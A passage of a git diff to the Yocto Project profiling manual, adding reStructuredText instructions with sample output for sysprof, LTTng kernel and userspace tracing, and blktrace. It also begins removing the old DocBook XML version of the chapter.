+``__mark_inode_dirty``:
+
+.. image:: figures/sysprof-callers.png
+   :align: center
+
+Double-clicking on one of those functions will in turn change the focus
+to the selected function, and so on.
+
+.. admonition:: Tying it Together
+
+   If you like sysprof's 'caller-oriented' display, you may be able to
+   approximate it in other tools as well. For example, 'perf report' has
+   the -g (--call-graph) option that you can experiment with; one of the
+   options is 'caller' for an inverted caller-based callgraph display.
+
+.. _sysprof-documentation:
+
+Sysprof Documentation
+---------------------
+
+There doesn't seem to be any documentation for Sysprof, but maybe that's
+because it's pretty self-explanatory. The Sysprof website, however, is
+here: `Sysprof, System-wide Performance Profiler for
+Linux <http://sysprof.com/>`__
+
+LTTng (Linux Trace Toolkit, next generation)
+============================================
+
+.. _lttng-setup:
+
+LTTng Setup
+-----------
+
+For this section, we'll assume you've already performed the basic setup
+outlined in the ":ref:`profile-manual/profile-manual-intro:General Setup`" section.
+LTTng is run on the target system by ssh'ing to it.
+
+Collecting and Viewing Traces
+-----------------------------
+
+Once you've applied the above commits and built and booted your image
+(you need to build the core-image-sato-sdk image or use one of the other
+methods described in the ":ref:`profile-manual/profile-manual-intro:General Setup`" section), you're ready to start
+tracing.
+
+Collecting and viewing a trace on the target (inside a shell)
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+First, from the host, ssh to the target: ::
+
+   $ ssh -l root 192.168.1.47
+   The authenticity of host '192.168.1.47 (192.168.1.47)' can't be established.
+   RSA key fingerprint is 23:bd:c8:b1:a8:71:52:00:ee:00:4f:64:9e:10:b9:7e.
+   Are you sure you want to continue connecting (yes/no)? yes
+   Warning: Permanently added '192.168.1.47' (RSA) to the list of known hosts.
+   root@192.168.1.47's password:
+
+Once on the target, use these steps to create a trace: ::
+
+   root@crownbay:~# lttng create
+   Spawning a session daemon
+   Session auto-20121015-232120 created.
+   Traces will be written in /home/root/lttng-traces/auto-20121015-232120
+
+Enable the events you want to trace (in this case all kernel events): ::
+
+   root@crownbay:~# lttng enable-event --kernel --all
+   All kernel events are enabled in channel channel0
+
+Start the trace: ::
+
+   root@crownbay:~# lttng start
+   Tracing started for session auto-20121015-232120
+
+And then stop the trace after awhile or after running a particular workload that
+you want to trace: ::
+
+   root@crownbay:~# lttng stop
+   Tracing stopped for session auto-20121015-232120
+
+You can now view the trace in text form on the target: ::
+
+   root@crownbay:~# lttng view
+   [23:21:56.989270399] (+?.?????????) sys_geteuid: { 1 }, { }
+   [23:21:56.989278081] (+0.000007682) exit_syscall: { 1 }, { ret = 0 }
+   [23:21:56.989286043] (+0.000007962) sys_pipe: { 1 }, { fildes = 0xB77B9E8C }
+   [23:21:56.989321802] (+0.000035759) exit_syscall: { 1 }, { ret = 0 }
+   [23:21:56.989329345] (+0.000007543) sys_mmap_pgoff: { 1 }, { addr = 0x0, len = 10485760, prot = 3, flags = 131362, fd = 4294967295, pgoff = 0 }
+   [23:21:56.989351694] (+0.000022349) exit_syscall: { 1 }, { ret = -1247805440 }
+   [23:21:56.989432989] (+0.000081295) sys_clone: { 1 }, { clone_flags = 0x411, newsp = 0xB5EFFFE4, parent_tid = 0xFFFFFFFF, child_tid = 0x0 }
+   [23:21:56.989477129] (+0.000044140) sched_stat_runtime: { 1 }, { comm = "lttng-consumerd", tid = 1193, runtime = 681660, vruntime = 43367983388 }
+   [23:21:56.989486697] (+0.000009568) sched_migrate_task: { 1 }, { comm = "lttng-consumerd", tid = 1193, prio = 20, orig_cpu = 1, dest_cpu = 1 }
+   [23:21:56.989508418] (+0.000021721) hrtimer_init: { 1 }, { hrtimer = 3970832076, clockid = 1, mode = 1 }
+   [23:21:56.989770462] (+0.000262044) hrtimer_cancel: { 1 }, { hrtimer = 3993865440 }
+   [23:21:56.989771580] (+0.000001118) hrtimer_cancel: { 0 }, { hrtimer = 3993812192 }
+   [23:21:56.989776957] (+0.000005377) hrtimer_expire_entry: { 1 }, { hrtimer = 3993865440, now = 79815980007057, function = 3238465232 }
+   [23:21:56.989778145] (+0.000001188) hrtimer_expire_entry: { 0 }, { hrtimer = 3993812192, now = 79815980008174, function = 3238465232 }
+   [23:21:56.989791695] (+0.000013550) softirq_raise: { 1 }, { vec = 1 }
+   [23:21:56.989795396] (+0.000003701) softirq_raise: { 0 }, { vec = 1 }
+   [23:21:56.989800635] (+0.000005239) softirq_raise: { 0 }, { vec = 9 }
+   [23:21:56.989807130] (+0.000006495) sched_stat_runtime: { 1 }, { comm = "lttng-consumerd", tid = 1193, runtime = 330710, vruntime = 43368314098 }
+   [23:21:56.989809993] (+0.000002863) sched_stat_runtime: { 0 }, { comm = "lttng-sessiond", tid = 1181, runtime = 1015313, vruntime = 36976733240 }
+   [23:21:56.989818514] (+0.000008521) hrtimer_expire_exit: { 0 }, { hrtimer = 3993812192 }
+   [23:21:56.989819631] (+0.000001117) hrtimer_expire_exit: { 1 }, { hrtimer = 3993865440 }
+   [23:21:56.989821866] (+0.000002235) hrtimer_start: { 0 }, { hrtimer = 3993812192, function = 3238465232, expires = 79815981000000, softexpires = 79815981000000 }
+   [23:21:56.989822984] (+0.000001118) hrtimer_start: { 1 }, { hrtimer = 3993865440, function = 3238465232, expires = 79815981000000, softexpires = 79815981000000 }
+   [23:21:56.989832762] (+0.000009778) softirq_entry: { 1 }, { vec = 1 }
+   [23:21:56.989833879] (+0.000001117) softirq_entry: { 0 }, { vec = 1 }
+   [23:21:56.989838069] (+0.000004190) timer_cancel: { 1 }, { timer = 3993871956 }
+   [23:21:56.989839187] (+0.000001118) timer_cancel: { 0 }, { timer = 3993818708 }
+   [23:21:56.989841492] (+0.000002305) timer_expire_entry: { 1 }, { timer = 3993871956, now = 79515980, function = 3238277552 }
+   [23:21:56.989842819] (+0.000001327) timer_expire_entry: { 0 }, { timer = 3993818708, now = 79515980, function = 3238277552 }
+   [23:21:56.989854831] (+0.000012012) sched_stat_runtime: { 1 }, { comm = "lttng-consumerd", tid = 1193, runtime = 49237, vruntime = 43368363335 }
+   [23:21:56.989855949] (+0.000001118) sched_stat_runtime: { 0 }, { comm = "lttng-sessiond", tid = 1181, runtime = 45121, vruntime = 36976778361 }
+   [23:21:56.989861257] (+0.000005308) sched_stat_sleep: { 1 }, { comm = "kworker/1:1", tid = 21, delay = 9451318 }
+   [23:21:56.989862374] (+0.000001117) sched_stat_sleep: { 0 }, { comm = "kworker/0:0", tid = 4, delay = 9958820 }
+   [23:21:56.989868241] (+0.000005867) sched_wakeup: { 0 }, { comm = "kworker/0:0", tid = 4, prio = 120, success = 1, target_cpu = 0 }
+   [23:21:56.989869358] (+0.000001117) sched_wakeup: { 1 }, { comm = "kworker/1:1", tid = 21, prio = 120, success = 1, target_cpu = 1 }
+   [23:21:56.989877460] (+0.000008102) timer_expire_exit: { 1 }, { timer = 3993871956 }
+   [23:21:56.989878577] (+0.000001117) timer_expire_exit: { 0 }, { timer = 3993818708 }
+   .
+   .
+   .
+
+You can now safely destroy the trace
+session (note that this doesn't delete the trace - it's still there in
+~/lttng-traces): ::
+
+   root@crownbay:~# lttng destroy
+   Session auto-20121015-232120 destroyed at /home/root
+
+Note that the trace is saved in a directory of the same name as returned by
+'lttng create', under the ~/lttng-traces directory (note that you can change this by
+supplying your own name to 'lttng create'): ::
+
+   root@crownbay:~# ls -al ~/lttng-traces
+   drwxrwx---    3 root     root          1024 Oct 15 23:21 .
+   drwxr-xr-x    5 root     root          1024 Oct 15 23:57 ..
+   drwxrwx---    3 root     root          1024 Oct 15 23:21 auto-20121015-232120
+
+Collecting and viewing a userspace trace on the target (inside a shell)
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+For LTTng userspace tracing, you need to have a properly instrumented
+userspace program. For this example, we'll use the 'hello' test program
+generated by the lttng-ust build.
+
+The 'hello' test program isn't installed on the rootfs by the lttng-ust
+build, so we need to copy it over manually. First cd into the build
+directory that contains the hello executable: ::
+
+   $ cd build/tmp/work/core2_32-poky-linux/lttng-ust/2.0.5-r0/git/tests/hello/.libs
+
+Copy that over to the target machine: ::
+
+   $ scp hello root@192.168.1.20:
+
+You now have the instrumented lttng 'hello world' test program on the
+target, ready to test.
+
+First, from the host, ssh to the target: ::
+
+   $ ssh -l root 192.168.1.47
+   The authenticity of host '192.168.1.47 (192.168.1.47)' can't be established.
+   RSA key fingerprint is 23:bd:c8:b1:a8:71:52:00:ee:00:4f:64:9e:10:b9:7e.
+   Are you sure you want to continue connecting (yes/no)? yes
+   Warning: Permanently added '192.168.1.47' (RSA) to the list of known hosts.
+   root@192.168.1.47's password:
+
+Once on the target, use these steps to create a trace: ::
+
+   root@crownbay:~# lttng create
+   Session auto-20190303-021943 created.
+   Traces will be written in /home/root/lttng-traces/auto-20190303-021943
+
+Enable the events you want to trace (in this case all userspace events): ::
+
+   root@crownbay:~# lttng enable-event --userspace --all
+   All UST events are enabled in channel channel0
+
+Start the trace: ::
+
+   root@crownbay:~# lttng start
+   Tracing started for session auto-20190303-021943
+
+Run the instrumented hello world program: ::
+
+   root@crownbay:~# ./hello
+   Hello, World!
+   Tracing... done.
+
+And then stop the trace after awhile or after running a particular workload
+that you want to trace: ::
+
+   root@crownbay:~# lttng stop
+   Tracing stopped for session auto-20190303-021943
+
+You can now view the trace in text form on the target: ::
+
+   root@crownbay:~# lttng view
+   [02:31:14.906146544] (+?.?????????) hello:1424 ust_tests_hello:tptest: { cpu_id = 1 }, { intfield = 0, intfield2 = 0x0, longfield = 0, netintfield = 0, netintfieldhex = 0x0, arrfield1 = [ [0] = 1, [1] = 2, [2] = 3 ], arrfield2 = "test", _seqfield1_length = 4, seqfield1 = [ [0] = 116, [1] = 101, [2] = 115, [3] = 116 ], _seqfield2_length = 4,  seqfield2 = "test", stringfield = "test", floatfield = 2222, doublefield = 2, boolfield = 1 }
+   [02:31:14.906170360] (+0.000023816) hello:1424 ust_tests_hello:tptest: { cpu_id = 1 }, { intfield = 1, intfield2 = 0x1, longfield = 1, netintfield = 1, netintfieldhex = 0x1, arrfield1 = [ [0] = 1, [1] = 2, [2] = 3 ], arrfield2 = "test", _seqfield1_length = 4, seqfield1 = [ [0] = 116, [1] = 101, [2] = 115, [3] = 116 ], _seqfield2_length = 4, seqfield2 = "test", stringfield = "test", floatfield = 2222, doublefield = 2, boolfield = 1 }
+   [02:31:14.906183140] (+0.000012780) hello:1424 ust_tests_hello:tptest: { cpu_id = 1 }, { intfield = 2, intfield2 = 0x2, longfield = 2, netintfield = 2, netintfieldhex = 0x2, arrfield1 = [ [0] = 1, [1] = 2, [2] = 3 ], arrfield2 = "test", _seqfield1_length = 4, seqfield1 = [ [0] = 116, [1] = 101, [2] = 115, [3] = 116 ], _seqfield2_length = 4, seqfield2 = "test", stringfield = "test", floatfield = 2222, doublefield = 2, boolfield = 1 }
+   [02:31:14.906194385] (+0.000011245) hello:1424 ust_tests_hello:tptest: { cpu_id = 1 }, { intfield = 3, intfield2 = 0x3, longfield = 3, netintfield = 3, netintfieldhex = 0x3, arrfield1 = [ [0] = 1, [1] = 2, [2] = 3 ], arrfield2 = "test", _seqfield1_length = 4, seqfield1 = [ [0] = 116, [1] = 101, [2] = 115, [3] = 116 ], _seqfield2_length = 4, seqfield2 = "test", stringfield = "test", floatfield = 2222, doublefield = 2, boolfield = 1 }
+   .
+   .
+   .
+
+You can now safely destroy the trace session (note that this doesn't delete the
+trace - it's still there in ~/lttng-traces): ::
+
+   root@crownbay:~# lttng destroy
+   Session auto-20190303-021943 destroyed at /home/root
+
+.. _lltng-documentation:
+
+LTTng Documentation
+-------------------
+
+You can find the primary LTTng Documentation on the `LTTng
+Documentation <https://lttng.org/docs/>`__ site. The documentation on
+this site is appropriate for intermediate to advanced software
+developers who are working in a Linux environment and are interested in
+efficient software tracing.
+
+For information on LTTng in general, visit the `LTTng
+Project <http://lttng.org/lttng2.0>`__ site. You can find a "Getting
+Started" link on this site that takes you to an LTTng Quick Start.
+
+.. _profile-manual-blktrace:
+
+blktrace
+========
+
+blktrace is a tool for tracing and reporting low-level disk I/O.
+blktrace provides the tracing half of the equation; its output can be
+piped into the blkparse program, which renders the data in a
+human-readable form and does some basic analysis:
+
+.. _blktrace-setup:
+
+blktrace Setup
+--------------
+
+For this section, we'll assume you've already performed the basic setup
+outlined in the ":ref:`profile-manual/profile-manual-intro:General Setup`"
+section.
+
+blktrace is an application that runs on the target system. You can run
+the entire blktrace and blkparse pipeline on the target, or you can run
+blktrace in 'listen' mode on the target and have blktrace and blkparse
+collect and analyze the data on the host (see the
+":ref:`profile-manual/profile-manual-usage:Using blktrace Remotely`" section
+below). For the rest of this section we assume you've ssh'ed to the host and
+will be running blkrace on the target.
+
+.. _blktrace-basic-usage:
+
+Basic blktrace Usage
+--------------------
+
+To record a trace, simply run the 'blktrace' command, giving it the name
+of the block device you want to trace activity on: ::
+
+   root@crownbay:~# blktrace /dev/sdc
+
+In another shell, execute a workload you want to trace. ::
+
+   root@crownbay:/media/sdc# rm linux-2.6.19.2.tar.bz2; wget http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2; sync
+   Connecting to downloads.yoctoproject.org (140.211.169.59:80)
+   linux-2.6.19.2.tar.b 100% \|*******************************\| 41727k 0:00:00 ETA
+
+Press Ctrl-C in the blktrace shell to stop the trace. It
+will display how many events were logged, along with the per-cpu file
+sizes (blktrace records traces in per-cpu kernel buffers and simply
+dumps them to userspace for blkparse to merge and sort later). ::
+
+   ^C=== sdc ===
+    CPU  0:                 7082 events,      332 KiB data
+    CPU  1:                 1578 events,       74 KiB data
+    Total:                  8660 events (dropped 0),      406 KiB data
+
+If you examine the files saved to disk, you see multiple files, one per CPU and
+with the device name as the first part of the filename: ::
+
+   root@crownbay:~# ls -al
+   drwxr-xr-x    6 root     root          1024 Oct 27 22:39 .
+   drwxr-sr-x    4 root     root          1024 Oct 26 18:24 ..
+   -rw-r--r--    1 root     root        339938 Oct 27 22:40 sdc.blktrace.0
+   -rw-r--r--    1 root     root         75753 Oct 27 22:40 sdc.blktrace.1
+
+To view the trace events, simply invoke 'blkparse' in the directory
+containing the trace files, giving it the device name that forms the
+first part of the filenames: ::
+
+   root@crownbay:~# blkparse sdc
+
+    8,32   1        1     0.000000000  1225  Q  WS 3417048 + 8 [jbd2/sdc-8]
+    8,32   1        2     0.000025213  1225  G  WS 3417048 + 8 [jbd2/sdc-8]
+    8,32   1        3     0.000033384  1225  P   N [jbd2/sdc-8]
+    8,32   1        4     0.000043301  1225  I  WS 3417048 + 8 [jbd2/sdc-8]
+    8,32   1        0     0.000057270     0  m   N cfq1225 insert_request
+    8,32   1        0     0.000064813     0  m   N cfq1225 add_to_rr
+    8,32   1        5     0.000076336  1225  U   N [jbd2/sdc-8] 1
+    8,32   1        0     0.000088559     0  m   N cfq workload slice:150
+    8,32   1        0     0.000097359     0  m   N cfq1225 set_active wl_prio:0 wl_type:1
+    8,32   1        0     0.000104063     0  m   N cfq1225 Not idling. st->count:1
+    8,32   1        0     0.000112584     0  m   N cfq1225 fifo=  (null)
+    8,32   1        0     0.000118730     0  m   N cfq1225 dispatch_insert
+    8,32   1        0     0.000127390     0  m   N cfq1225 dispatched a request
+    8,32   1        0     0.000133536     0  m   N cfq1225 activate rq, drv=1
+    8,32   1        6     0.000136889  1225  D  WS 3417048 + 8 [jbd2/sdc-8]
+    8,32   1        7     0.000360381  1225  Q  WS 3417056 + 8 [jbd2/sdc-8]
+    8,32   1        8     0.000377422  1225  G  WS 3417056 + 8 [jbd2/sdc-8]
+    8,32   1        9     0.000388876  1225  P   N [jbd2/sdc-8]
+    8,32   1       10     0.000397886  1225  Q  WS 3417064 + 8 [jbd2/sdc-8]
+    8,32   1       11     0.000404800  1225  M  WS 3417064 + 8 [jbd2/sdc-8]
+    8,32   1       12     0.000412343  1225  Q  WS 3417072 + 8 [jbd2/sdc-8]
+    8,32   1       13     0.000416533  1225  M  WS 3417072 + 8 [jbd2/sdc-8]
+    8,32   1       14     0.000422121  1225  Q  WS 3417080 + 8 [jbd2/sdc-8]
+    8,32   1       15     0.000425194  1225  M  WS 3417080 + 8 [jbd2/sdc-8]
+    8,32   1       16     0.000431968  1225  Q  WS 3417088 + 8 [jbd2/sdc-8]
+    8,32   1       17     0.000435251  1225  M  WS 3417088 + 8 [jbd2/sdc-8]
+    8,32   1       18     0.000440279  1225  Q  WS 3417096 + 8 [jbd2/sdc-8]
+    8,32   1       19     0.000443911  1225  M  WS 3417096 + 8 [jbd2/sdc-8]
+    8,32   1       20     0.000450336  1225  Q  WS 3417104 + 8 [jbd2/sdc-8]
+    8,32   1       21     0.000454038  1225  M  WS 3417104 + 8 [jbd2/sdc-8]
+    8,32   1       22     0.000462070  1225  Q  WS 3417112 + 8 [jbd2/sdc-8]
+    8,32   1       23     0.000465422  1225  M  WS 3417112 + 8 [jbd2/sdc-8]
+    8,32   1       24     0.000474222  1225  I  WS 3417056 + 64 [jbd2/sdc-8]
+    8,32   1        0     0.000483022     0  m   N cfq1225 insert_request
+    8,32   1       25     0.000489727  1225  U   N [jbd2/sdc-8] 1
+    8,32   1        0     0.000498457     0  m   N cfq1225 Not idling. st->count:1
+    8,32   1        0     0.000503765     0  m   N cfq1225 dispatch_insert
+    8,32   1        0     0.000512914     0  m   N cfq1225 dispatched a request
+    8,32   1        0     0.000518851     0  m   N cfq1225 activate rq, drv=2
+    .
+    .
+    .
+    8,32   0        0    58.515006138     0  m   N cfq3551 complete rqnoidle 1
+    8,32   0     2024    58.516603269     3  C  WS 3156992 + 16 [0]
+    8,32   0        0    58.516626736     0  m   N cfq3551 complete rqnoidle 1
+    8,32   0        0    58.516634558     0  m   N cfq3551 arm_idle: 8 group_idle: 0
+    8,32   0        0    58.516636933     0  m   N cfq schedule dispatch
+    8,32   1        0    58.516971613     0  m   N cfq3551 slice expired t=0
+    8,32   1        0    58.516982089     0  m   N cfq3551 sl_used=13 disp=6 charge=13 iops=0 sect=80
+    8,32   1        0    58.516985511     0  m   N cfq3551 del_from_rr
+    8,32   1        0    58.516990819     0  m   N cfq3551 put_queue
+
+   CPU0 (sdc):
+    Reads Queued:           0,        0KiB	 Writes Queued:         331,   26,284KiB
+    Read Dispatches:        0,        0KiB	 Write Dispatches:      485,   40,484KiB
+    Reads Requeued:         0		 Writes Requeued:         0
+    Reads Completed:        0,        0KiB	 Writes Completed:      511,   41,000KiB
+    Read Merges:            0,        0KiB	 Write Merges:           13,      160KiB
+    Read depth:             0        	 Write depth:             2
+    IO unplugs:            23        	 Timer unplugs:           0
+   CPU1 (sdc):
+    Reads Queued:           0,        0KiB	 Writes Queued:         249,   15,800KiB
+    Read Dispatches:        0,        0KiB	 Write Dispatches:       42,    1,600KiB
+    Reads Requeued:         0		 Writes Requeued:         0
+    Reads Completed:        0,        0KiB	 Writes Completed:       16,    1,084KiB
+    Read Merges:            0,        0KiB	 Write Merges:           40,      276KiB
+    Read depth:             0        	 Write depth:             2
+    IO unplugs:            30        	 Timer unplugs:           1
+
+   Total (sdc):
+    Reads Queued:           0,        0KiB	 Writes Queued:         580,   42,084KiB
+    Read Dispatches:        0,        0KiB	 Write Dispatches:      527,   42,084KiB
+    Reads Requeued:         0		 Writes Requeued:         0
+    Reads Completed:        0,        0KiB	 Writes Completed:      527,   42,084KiB
+    Read Merges:            0,        0KiB	 Write Merges:           53,      436KiB
+    IO unplugs:            53        	 Timer unplugs:           1
+
+   Throughput (R/W): 0KiB/s / 719KiB/s
+   Events (sdc): 6,592 entries
+   Skips: 0 forward (0 -   0.0%)
+   Input file sdc.blktrace.0 added
+   Input file sdc.blktrace.1 added
+
+The report shows each event that was
+found in the blktrace data, along with a summary of the overall block
+I/O traffic during the run. You can look at the
+`blkparse <http://linux.die.net/man/1/blkparse>`__ manpage to learn the
+meaning of each field displayed in the trace listing.
+
+.. _blktrace-live-mode:
+
+Live Mode
+~~~~~~~~~
+
+blktrace and blkparse are designed from the ground up to be able to
+operate together in a 'pipe mode' where the stdout of blktrace can be
+fed directly into the stdin of blkparse: ::
+
+   root@crownbay:~# blktrace /dev/sdc -o - | blkparse -i -
+
+This enables long-lived tracing sessions
+to run without writing anything to disk, and allows the user to look for
+certain conditions in the trace data in 'real-time' by viewing the trace
+output as it scrolls by on the screen or by passing it along to yet
+another program in the pipeline such as grep which can be used to
+identify and capture conditions of interest.
+
+There's actually another blktrace command that implements the above
+pipeline as a single command, so the user doesn't have to bother typing
+in the above command sequence: ::
+
+   root@crownbay:~# btrace /dev/sdc
+
+Using blktrace Remotely
+~~~~~~~~~~~~~~~~~~~~~~~
+
+Because blktrace traces block I/O and at the same time normally writes
+its trace data to a block device, and in general because it's not really
+a great idea to make the device being traced the same as the device the
+tracer writes to, blktrace provides a way to trace without perturbing
+the traced device at all by providing native support for sending all
+trace data over the network.
+
+To have blktrace operate in this mode, start blktrace on the target
+system being traced with the -l option, along with the device to trace: ::
+
+   root@crownbay:~# blktrace -l /dev/sdc
+   server: waiting for connections...
+
+On the host system, use the -h option to connect to the target system,
+also passing it the device to trace: ::
+
+   $ blktrace -d /dev/sdc -h 192.168.1.43
+   blktrace: connecting to 192.168.1.43
+   blktrace: connected!
+
+On the target system, you should see this: ::
+
+   server: connection from 192.168.1.43
+
+In another shell, execute a workload you want to trace. ::
+
+   root@crownbay:/media/sdc# rm linux-2.6.19.2.tar.bz2; wget http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2; sync
+   Connecting to downloads.yoctoproject.org (140.211.169.59:80)
+   linux-2.6.19.2.tar.b 100% \|*******************************\| 41727k 0:00:00 ETA
+
+When it's done, do a Ctrl-C on the host system to stop the
+trace: ::
+
+   ^C=== sdc ===
+    CPU  0:                 7691 events,      361 KiB data
+    CPU  1:                 4109 events,      193 KiB data
+    Total:                 11800 events (dropped 0),      554 KiB data
+
+On the target system, you should also see a trace summary for the trace
+just ended: ::
+
+   server: end of run for 192.168.1.43:sdc
+   === sdc ===
+    CPU  0:                 7691 events,      361 KiB data
+    CPU  1:                 4109 events,      193 KiB data
+    Total:                 11800 events (dropped 0),      554 KiB data
+
+The blktrace instance on the host will
+save the target output inside a hostname-timestamp directory: ::
+
+   $ ls -al
+   drwxr-xr-x   10 root     root          1024 Oct 28 02:40 .
+   drwxr-sr-x    4 root     root          1024 Oct 26 18:24 ..
+   drwxr-xr-x    2 root     root          1024 Oct 28 02:40 192.168.1.43-2012-10-28-02:40:56
+
+cd into that directory to see the output files: ::
+
+   $ ls -l
+   -rw-r--r--    1 root     root        369193 Oct 28 02:44 sdc.blktrace.0
+   -rw-r--r--    1 root     root        197278 Oct 28 02:44 sdc.blktrace.1
+
+And run blkparse on the host system using the device name: ::
+
+   $ blkparse sdc
+
+    8,32   1        1     0.000000000  1263  Q  RM 6016 + 8 [ls]
+    8,32   1        0     0.000036038     0  m   N cfq1263 alloced
+    8,32   1        2     0.000039390  1263  G  RM 6016 + 8 [ls]
+    8,32   1        3     0.000049168  1263  I  RM 6016 + 8 [ls]
+    8,32   1        0     0.000056152     0  m   N cfq1263 insert_request
+    8,32   1        0     0.000061600     0  m   N cfq1263 add_to_rr
+    8,32   1        0     0.000075498     0  m   N cfq workload slice:300
+    .
+    .
+    .
+    8,32   0        0   177.266385696     0  m   N cfq1267 arm_idle: 8 group_idle: 0
+    8,32   0        0   177.266388140     0  m   N cfq schedule dispatch
+    8,32   1        0   177.266679239     0  m   N cfq1267 slice expired t=0
+    8,32   1        0   177.266689297     0  m   N cfq1267 sl_used=9 disp=6 charge=9 iops=0 sect=56
+    8,32   1        0   177.266692649     0  m   N cfq1267 del_from_rr
+    8,32   1        0   177.266696560     0  m   N cfq1267 put_queue
+
+   CPU0 (sdc):
+    Reads Queued:           0,        0KiB	 Writes Queued:         270,   21,708KiB
+    Read Dispatches:       59,    2,628KiB	 Write Dispatches:      495,   39,964KiB
+    Reads Requeued:         0		 Writes Requeued:         0
+    Reads Completed:       90,    2,752KiB	 Writes Completed:      543,   41,596KiB
+    Read Merges:            0,        0KiB	 Write Merges:            9,      344KiB
+    Read depth:             2        	 Write depth:             2
+    IO unplugs:            20        	 Timer unplugs:           1
+   CPU1 (sdc):
+    Reads Queued:         688,    2,752KiB	 Writes Queued:         381,   20,652KiB
+    Read Dispatches:       31,      124KiB	 Write Dispatches:       59,    2,396KiB
+    Reads Requeued:         0		 Writes Requeued:         0
+    Reads Completed:        0,        0KiB	 Writes Completed:       11,      764KiB
+    Read Merges:          598,    2,392KiB	 Write Merges:           88,      448KiB
+    Read depth:             2        	 Write depth:             2
+    IO unplugs:            52        	 Timer unplugs:           0
+
+   Total (sdc):
+    Reads Queued:         688,    2,752KiB	 Writes Queued:         651,   42,360KiB
+    Read Dispatches:       90,    2,752KiB	 Write Dispatches:      554,   42,360KiB
+    Reads Requeued:         0		 Writes Requeued:         0
+    Reads Completed:       90,    2,752KiB	 Writes Completed:      554,   42,360KiB
+    Read Merges:          598,    2,392KiB	 Write Merges:           97,      792KiB
+    IO unplugs:            72        	 Timer unplugs:           1
+
+   Throughput (R/W): 15KiB/s / 238KiB/s
+   Events (sdc): 9,301 entries
+   Skips: 0 forward (0 -   0.0%)
+
+You should see the trace events and summary just as you would have if you'd run
+the same command on the target.
+
+Tracing Block I/O via 'ftrace'
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+It's also possible to trace block I/O using only
+:ref:`profile-manual/profile-manual-usage:The 'trace events' Subsystem`, which
+can be useful for casual tracing if you don't want to bother dealing with the
+userspace tools.
+
+To enable tracing for a given device, use /sys/block/xxx/trace/enable,
+where xxx is the device name. This for example enables tracing for
+/dev/sdc: ::
+
+   root@crownbay:/sys/kernel/debug/tracing# echo 1 > /sys/block/sdc/trace/enable
+
+Once you've selected the device(s) you want
+to trace, selecting the 'blk' tracer will turn the blk tracer on: ::
+
+   root@crownbay:/sys/kernel/debug/tracing# cat available_tracers
+   blk function_graph function nop
+
+   root@crownbay:/sys/kernel/debug/tracing# echo blk > current_tracer
+
+Execute the workload you're interested in: ::
+
+   root@crownbay:/sys/kernel/debug/tracing# cat /media/sdc/testfile.txt
+
+And look at the output (note here that we're using 'trace_pipe' instead of
+trace to capture this trace - this allows us to wait around on the pipe
+for data to appear): ::
+
+   root@crownbay:/sys/kernel/debug/tracing# cat trace_pipe
+               cat-3587  [001] d..1  3023.276361:   8,32   Q   R 1699848 + 8 [cat]
+               cat-3587  [001] d..1  3023.276410:   8,32   m   N cfq3587 alloced
+               cat-3587  [001] d..1  3023.276415:   8,32   G   R 1699848 + 8 [cat]
+               cat-3587  [001] d..1  3023.276424:   8,32   P   N [cat]
+               cat-3587  [001] d..2  3023.276432:   8,32   I   R 1699848 + 8 [cat]
+               cat-3587  [001] d..1  3023.276439:   8,32   m   N cfq3587 insert_request
+               cat-3587  [001] d..1  3023.276445:   8,32   m   N cfq3587 add_to_rr
+               cat-3587  [001] d..2  3023.276454:   8,32   U   N [cat] 1
+               cat-3587  [001] d..1  3023.276464:   8,32   m   N cfq workload slice:150
+               cat-3587  [001] d..1  3023.276471:   8,32   m   N cfq3587 set_active wl_prio:0 wl_type:2
+               cat-3587  [001] d..1  3023.276478:   8,32   m   N cfq3587 fifo=  (null)
+               cat-3587  [001] d..1  3023.276483:   8,32   m   N cfq3587 dispatch_insert
+               cat-3587  [001] d..1  3023.276490:   8,32   m   N cfq3587 dispatched a request
+               cat-3587  [001] d..1  3023.276497:   8,32   m   N cfq3587 activate rq, drv=1
+               cat-3587  [001] d..2  3023.276500:   8,32   D   R 1699848 + 8 [cat]
+
+And this turns off tracing for the specified device: ::
+
+   root@crownbay:/sys/kernel/debug/tracing# echo 0 > /sys/block/sdc/trace/enable
+
+.. _blktrace-documentation:
+
+blktrace Documentation
+----------------------
+
+Online versions of the man pages for the commands discussed in this
+section can be found here:
+
+-  http://linux.die.net/man/8/blktrace
+
+-  http://linux.die.net/man/1/blkparse
+
+-  http://linux.die.net/man/8/btrace
+
+The above manpages, along with manpages for the other blktrace utilities
+(btt, blkiomon, etc) can be found in the /doc directory of the blktrace
+tools git repo: ::
+
+   $ git clone git://git.kernel.dk/blktrace.git
diff --git a/documentation/profile-manual/profile-manual-usage.xml b/documentation/profile-manual/profile-manual-usage.xml
deleted file mode 100644
index 9a4273a0fe..0000000000
--- a/documentation/profile-manual/profile-manual-usage.xml
+++ /dev/null
@@ -1,2985 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='profile-manual-usage'>
-
-<title>Basic Usage (with examples) for each of the Yocto Tracing Tools</title>
-
-<para>
-    This chapter presents basic usage examples for each of the tracing
-    tools.
-</para>
-
-<section id='profile-manual-perf'>
-    <title>perf</title>
-
-    <para>
-        The 'perf' tool is the profiling and tracing tool that comes
-        bundled with the Linux kernel.
-    </para>
-
-    <para>
-        Don't let the fact that it's part of the kernel fool you into thinking
-        that it's only for tracing and profiling the kernel - you can indeed
-        use it to trace and profile just the kernel, but you can also use it
-        to profile specific applications separately (with or without kernel
-        context), and you can also use it to trace and profile the kernel
-        and all applications on the system simultaneously to gain a system-wide
-        view of what's going on.
-    </para>
-
-    <para>
-        In many ways, perf aims to be a superset of all the tracing and profiling
-        tools available in Linux today, including all the other tools covered
-        in this HOWTO. The past couple of years have seen perf subsume a lot
-        of the functionality of those other tools and, at the same time, those
-        other tools have removed large portions of their previous functionality
-        and replaced it with calls to the equivalent functionality now
-        implemented by the perf subsystem. Extrapolation suggests that at
-        some point those other tools will simply become completely redundant
